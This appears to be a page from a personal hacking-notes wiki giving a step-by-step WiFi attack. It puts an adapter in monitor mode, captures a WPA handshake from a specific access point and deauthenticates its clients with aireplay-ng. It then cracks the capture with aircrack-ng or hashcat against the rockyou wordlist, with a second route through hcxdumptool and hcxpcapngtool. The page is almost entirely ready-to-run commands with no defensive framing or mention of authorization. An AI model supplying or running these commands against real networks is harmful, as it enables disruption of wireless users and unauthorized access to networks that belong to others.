Wifi Hacking
Aircrack Suite
Capturing
iwconfig- Check for adaptorsudo airmon-ng start wlan0- put adaptor in monitor modeiwconfig- Check the updated interface nameairodump-ng wlan0mon- use the updated interface nameairodump-ng -c 6 --bssid C0:F6:C2:5E:8D:20 -w pass wlan0mon-c- channel--bssid- access point MAC address-w- output file name
Deauthenticate the wireless clients:
Open new terminal on the side
aireplay-ng -0 100 -a C0:F6:C2:5E:8D:20 wlan0mon
ctrl + c- once you have captured handshake
Cracking
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b C0:F6:C2:5E:8D:20 pass*.cap
Converting to Hashcat
aircrack-ng -j hash NinjaJc01-01.capHCXdumptool
Capturing
sudo apt-get install hcxdumptoolsudo systemctl stop NetworkManagersudo systemctl stop wpa_supplicantsudo hcxdumptool -i wlan0 --do_rcascan- scan for available networkssudo hcxdumptool -i wlan0 -o dumpfile.pcapng -active_beacon -enable_status=15- capture traffic
Converting to Hashcat
sudo apt-get install hcxtoolshcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapngCheck essidlist file for name of wifi networks sometimes leaked password -
nano essidlistsudo hcxdumptool -i wlan0 --do_rcascannano hash.hc22000- delete excessive hashes and keep only the target network handshakes
Cracking
hashcat ‐m 22000 ‐a 0 ‐o cracked.txt hash.hc22000 rockyou.txt
Wordlists
Last updated
Was this helpful?